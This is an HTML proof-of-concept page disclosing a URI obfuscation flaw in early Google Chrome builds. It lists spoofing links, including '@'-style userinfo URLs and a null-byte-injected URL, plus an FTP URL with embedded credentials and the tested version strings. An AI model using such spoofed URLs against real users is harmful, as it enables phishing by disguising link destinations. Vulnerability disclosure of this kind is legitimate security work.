|
<html>
<title>Google Chrome MetaCharacter URI Obfuscation Vulnerability.</title>
<head></head>
<body><br><br>
<h2><center>Google Chrome MetaCharacter URI Obfuscation Vulnerability.<br><br>Proof of Concept</br></br> </center></h2>
<center>
<b>Note: Google Chrome MetaCharacter URI Obfuscation Vulnerability.</b><br><br>
<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical dependent on the object usage.<br><br>
Check the Status Bar for Address Problem. Have a Look at the Source too.</b></br></br>
<hr></hr>
<b><center><br>
<h1> URL Spoofing is pointed as Virus on this Server.</h1>
<b>index.html (index.html): Virus Detected; File not Uploaded! (Exploit.URLSpoof.gen.2 FOUND). No Direct URL. Sorry for that.</b><br><br>
Link1 : <b> ftp://anoymous:guest@microsoft.com</b> <br><br>
Link2 : [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]<br><br>
Link3 : http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]<br><br>
Check the Status Bar for Address Problem,</b></br></br>
<hr></hr>
<b><center>
<h2> Microsoft FTP Site Analysis through URI Obfuscation in Google Chrome.</h2>
<h3>FTP Link Check with No Credentials</h3>
<img src="stat1.jpg"></img><br><br>
<h3>Response for FTP with Credentials.</h3>
<img src="stat2.jpg"></img><br><br>
</center>
<hr></hr>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
<br><br>
Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</center>
</body>
</html>
|
推荐
评论(0条)
